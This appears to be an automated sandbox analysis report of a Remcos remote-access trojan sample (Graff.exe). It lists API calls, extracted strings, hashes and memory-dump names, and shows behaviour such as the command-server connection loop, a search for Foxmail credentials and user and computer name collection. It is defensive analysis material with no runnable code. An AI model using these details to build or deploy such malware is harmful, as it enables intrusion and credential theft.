Source File: 00000002.00000002.3737593649.0000000000871000.00000040.00000001.01000000.00000004.sdmp, Offset: 00870000, based on PE: true

Associated: 00000002.00000002.3737547117.0000000000870000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.0000000000932000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000093C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000095C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.00000000009DC000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738202698.00000000009E2000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009E3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009ED000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009FB000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_870000_Graff.jbxd

Similarity

API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
String ID: TaskbarCreated
API String ID: 157504867-2362178303
Opcode ID: 98652667735daae5a479db05fa3a4778f0d834ed94ab3c3e7d186b90937a0024
Instruction ID: 53ca8591b5126f70eebca96c7abf04fca6732b90b56e1d006489295645aa3782
Opcode Fuzzy Hash: 98652667735daae5a479db05fa3a4778f0d834ed94ab3c3e7d186b90937a0024
Instruction Fuzzy Hash: 79411735278208ABDB255B7C9C09FB93B59F706345F148225F90AC63AAD771CA80B773

Function 100010F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
FindClose.KERNEL32(00000000), ref: 100011DB

Memory Dump Source

Source File: 00000002.00000002.3743674864.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.3743631147.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3743674864.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Graff.jbxd

Similarity

API ID: lstrlen$Find$File$CloseFirstNextlstrcat
String ID:
API String ID: 1083526818-0
Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6

Function 0040E54F Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 88sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500

Sleep.KERNEL32(00000BB8), ref: 0040E603
ExitProcess.KERNEL32 ref: 0040E672

Strings

pth_unenc, xrefs: 0040E565, 0040E5AC, 0040E619
BG, xrefs: 0040E560
5.3.0 Pro, xrefs: 0040E5DE, 0040E64B
override, xrefs: 0040E574

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: CloseExitOpenProcessQuerySleepValue
String ID: 5.3.0 Pro$override$pth_unenc$BG
API String ID: 2281282204-3981147832
Opcode ID: dca5ffa1f26a58f88eabcf4e1c6adf70a88f5eb93220c74e9f8d60f60b37ffdd
Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
Opcode Fuzzy Hash: dca5ffa1f26a58f88eabcf4e1c6adf70a88f5eb93220c74e9f8d60f60b37ffdd
Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF

Function 00410B19 Relevance: 7.7, APIs: 5, Instructions: 198memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF

GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
RtlAllocateHeap.NTDLL(00000000), ref: 00410C31
SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: ErrorLast$Heap$AllocateInfoNativeProcessSystem
String ID:
API String ID: 4001361727-0
Opcode ID: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
Opcode Fuzzy Hash: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99

Function 0040455B Relevance: 4.5, APIs: 3, Instructions: 28synchronizationnetworkCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
recv.WS2_32(?,?,?,00000000), ref: 0040459F

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: EventObjectSingleWaitrecv
String ID:
API String ID: 311754179-0
Opcode ID: f607482e4343822148b028568a10a35340e8017a1e546fdda455ad4df8589c88
Instruction ID: 26c9fa113e50de76ad78d978a7fe27ea9b76c3f20528cd6e12f8aa4c3c3b2b63
Opcode Fuzzy Hash: f607482e4343822148b028568a10a35340e8017a1e546fdda455ad4df8589c88
Instruction Fuzzy Hash: 3FF08236108212BFD7018B14FC08E1AFBA2FB88721F10863AF614522A19771EC20DB59

Function 0041A7A2 Relevance: 3.0, APIs: 2, Instructions: 40COMMON

Download Yara Rule

APIs

GetComputerNameExW.KERNEL32(00000001,?,0000002B,00474358), ref: 0041A7BF
GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Name$ComputerUser
String ID:
API String ID: 4229901323-0
Opcode ID: d080141cef9e3990b2f6bec53120ee530cdf67b1126702e4f13589ad74e7334c
Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
Opcode Fuzzy Hash: d080141cef9e3990b2f6bec53120ee530cdf67b1126702e4f13589ad74e7334c
Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98

Function 0040D767 Relevance: 95.3, APIs: 13, Strings: 41, Instructions: 799
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD30
Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD44
Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\misruling\Graff.exe,00000104), ref: 0040D790

Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF

Strings

BG, xrefs: 0040DBC0
Exe, xrefs: 0040D8B6
XCG, xrefs: 0040DC4E
del, xrefs: 0040E078
@CG, xrefs: 0040DC07
XCG, xrefs: 0040DEA3
XCG, xrefs: 0040DAE9
XCG, xrefs: 0040DDD6
BG, xrefs: 0040DCF6
Remcos Agent initialized, xrefs: 0040DD8C
BG, xrefs: 0040DBF5
XCG, xrefs: 0040D7FF
Administrator, xrefs: 0040E02C
Exe, xrefs: 0040D8B1
XCG, xrefs: 0040DD01
XCG, xrefs: 0040DEF4
`=G, xrefs: 0040DF48
Inj, xrefs: 0040D977, 0040D98E
dCG, xrefs: 0040DFC4
Software\, xrefs: 0040D865
XCG, xrefs: 0040DF67
del, xrefs: 0040E094, 0040E0F4
license_code.txt, xrefs: 0040D7EF
XCG, xrefs: 0040DECB
User, xrefs: 0040E038
BG, xrefs: 0040DC1C
XCG, xrefs: 0040DF93
XCG, xrefs: 0040DB75
BG, xrefs: 0040DBB6
@CG, xrefs: 0040DCBE
licence, xrefs: 0040DD25
XCG, xrefs: 0040DF27
C:\Users\user\AppData\Local\misruling\Graff.exe, xrefs: 0040D788, 0040DBB1
Access Level: , xrefs: 0040E047
XCG, xrefs: 0040D838
exepath, xrefs: 0040DC34, 0040DCDE
XCG, xrefs: 0040DB1D
0DG, xrefs: 0040D914
XCG, xrefs: 0040DE78
Rmc-MKYDDH, xrefs: 0040D8A7, 0040D904
XCG, xrefs: 0040DDBF

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
String ID: 0DG$@CG$@CG$Access Level: $Administrator$C:\Users\user\AppData\Local\misruling\Graff.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-MKYDDH$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
API String ID: 2830904901-4138180055
Opcode ID: 4994f84fa7c1a3ac3b0baf488324d9d2996b4eb1537ae9876c417cc3aea4d29b
Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
Opcode Fuzzy Hash: 4994f84fa7c1a3ac3b0baf488324d9d2996b4eb1537ae9876c417cc3aea4d29b
Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E

Function 00413FD4 Relevance: 51.6, APIs: 5, Strings: 24, Instructions: 813
sleepnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
WSAGetLastError.WS2_32 ref: 00414249
Sleep.KERNEL32(00000000,00000002), ref: 00414B88

Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0

Strings

Exe, xrefs: 004144A4
>G, xrefs: 00414499
TLS On , xrefs: 004141A1
BG, xrefs: 004144B0
TLS Off, xrefs: 00414193, 004141A6
5.3.0 Pro, xrefs: 0041457C
Disconnected, xrefs: 00414AF8
XCG, xrefs: 00414001
>G, xrefs: 004144D7
| , xrefs: 004141CA, 00414310
name, xrefs: 0041441A
dCG, xrefs: 004145AF
%I64u, xrefs: 004143AD
XCG, xrefs: 00414B4F
@CG, xrefs: 004143F4
hlight, xrefs: 00414447
Connection Error: Unable to create socket, xrefs: 004142A4
C:\Users\user\AppData\Local\misruling\Graff.exe, xrefs: 00414474
Connected | , xrefs: 0041430B
Connecting | , xrefs: 004141C0
XCG, xrefs: 004143DC
Rmc-MKYDDH, xrefs: 004144E0
Connection Error: , xrefs: 0041425A
`=G, xrefs: 0041454A

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Sleep$ErrorLastLocalTime
String ID: | $%I64u$5.3.0 Pro$@CG$C:\Users\user\AppData\Local\misruling\Graff.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Rmc-MKYDDH$TLS Off$TLS On $XCG$XCG$XCG$`=G$dCG$hlight$name$>G$>G$BG
API String ID: 524882891-3815295930
Opcode ID: 77bab0f4032b4bb6c535f307305efcd8139569ba45fd6a1ececa0dfd20abe0c8
Instruction ID: a0bb0b13232d9f5991351636829aab2dda2428bc81dc0b9639db3628de0ead2f
Opcode Fuzzy Hash: 77bab0f4032b4bb6c535f307305efcd8139569ba45fd6a1ececa0dfd20abe0c8
Instruction Fuzzy Hash: 58524E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D

Function 00411C81 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 479
sleepfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A

Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,774D3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F

Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5

Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
Sleep.KERNEL32(00000064), ref: 00412060

Part of subcall function 00404468: send.WS2_32(0000030C,00000000,00000000,00000000), ref: 004044FD

Strings

HDG, xrefs: 00412316
>G, xrefs: 00412132
>G, xrefs: 0041227E
/stext ", xrefs: 00411D77, 00411E19, 00411EBB
HDG, xrefs: 004121F2

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
String ID: /stext "$HDG$HDG$>G$>G
API String ID: 1223786279-3931108886
Opcode ID: b3a170e4a916a5a789b040c07eeae84b29d4d491831939789a069747be3cd386
Instruction ID: 1febf249a593eb43810efab42e14b6693ac358e03ba90545e56d33427da79e18
Opcode Fuzzy Hash: b3a170e4a916a5a789b040c07eeae84b29d4d491831939789a069747be3cd386
Instruction Fuzzy Hash: 960243315083414AC325FB61D891AEFB7D5AFD4308F50493FF88A931E2EF785A49C69A

Function 100012EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434

Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB

lstrlenW.KERNEL32(?), ref: 100014C5
lstrlenW.KERNEL32(?), ref: 100014E0
lstrlenW.KERNEL32(?,?), ref: 1000150F
lstrcatW.KERNEL32(00000000), ref: 10001521
lstrlenW.KERNEL32(?,?), ref: 10001547
lstrcatW.KERNEL32(00000000), ref: 10001553
lstrlenW.KERNEL32(?,?), ref: 10001579
lstrcatW.KERNEL32(00000000), ref: 10001585
lstrlenW.KERNEL32(?,?), ref: 100015AB
lstrcatW.KERNEL32(00000000), ref: 100015B7

Strings

ProgramFiles, xrefs: 1000142F
), xrefs: 100014C7
Foxmail, xrefs: 1000143F, 10001453, 10001467, 1000147B, 1000148F, 100014A3, 100014F7, 10001527, 10001559, 1000158B, 100015BD

Memory Dump Source

Source File: 00000002.00000002.3743674864.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.3743631147.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3743674864.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Graff.jbxd

Similarity

API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
String ID: )$Foxmail$ProgramFiles
API String ID: 672098462-2938083778
Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

Function 0087D730 Relevance: 21.6, APIs: 14, Instructions: 631windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 0087D807
timeGetTime.WINMM ref: 0087DA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0087DB28
TranslateMessage.USER32(?), ref: 0087DB7B
DispatchMessageW.USER32(?), ref: 0087DB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0087DB9F
Sleep.KERNEL32(0000000A), ref: 0087DBB1

Memory Dump Source

Source File: 00000002.00000002.3737593649.0000000000871000.00000040.00000001.01000000.00000004.sdmp, Offset: 00870000, based on PE: true

Associated: 00000002.00000002.3737547117.0000000000870000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.0000000000932000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000093C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000095C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.00000000009DC000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738202698.00000000009E2000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009E3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009ED000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009FB000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_870000_Graff.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: fa0fab0d079b1734f76be1e12a5f2955898042ad3742bff6f819e16d0ddd36f3
Instruction ID: 285f65bffd2eaff46d4e708e3d860d1987e87cc50965626e0908af4d021220b9
Opcode Fuzzy Hash: fa0fab0d079b1734f76be1e12a5f2955898042ad3742bff6f819e16d0ddd36f3
Instruction Fuzzy Hash: D4429A706083459FDB29DB28C884F6ABBF0FF86314F14865DE55AC72A1D770E884DB92

Function 008742DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 0087430D

Part of subcall function 00876B57: _wcslen.LIBCMT ref: 00876B6A

GetCurrentProcess.KERNEL32(?,0090CB64,00000000,?,?), ref: 00874422
IsWow64Process.KERNEL32(00000000,?,?), ref: 00874429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00874454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00874466
GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00874474
FreeLibrary.KERNEL32(00000000,?,?), ref: 0087447B
GetSystemInfo.KERNEL32(?,?,?), ref: 008744A0

Strings

|O, xrefs: 008B36F8
kernel32.dll, xrefs: 0087444F
GetNativeSystemInfo, xrefs: 00874460

Memory Dump Source

Source File: 00000002.00000002.3737593649.0000000000871000.00000040.00000001.01000000.00000004.sdmp, Offset: 00870000, based on PE: true

Associated: 00000002.00000002.3737547117.0000000000870000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.0000000000932000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000093C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000095C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.00000000009DC000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738202698.00000000009E2000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009E3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009ED000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009FB000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_870000_Graff.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: 7b638bb624e2cd35b35cb9589c78fe683796eacdc9a2b4675e97acec5237a209
Instruction ID: 97498a7a1bfdebb1de76cfa6793bcf67de69e872355c36e1547a5b23a787ab85
Opcode Fuzzy Hash: 7b638bb624e2cd35b35cb9589c78fe683796eacdc9a2b4675e97acec5237a209
Instruction Fuzzy Hash: B7A1C46A93E2C4DFC711CF697C409E57FA4BB27744B0495A9E045D3B26E32085C8FB25

Function 00409E48 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00001388), ref: 00409E62

Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40

Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633

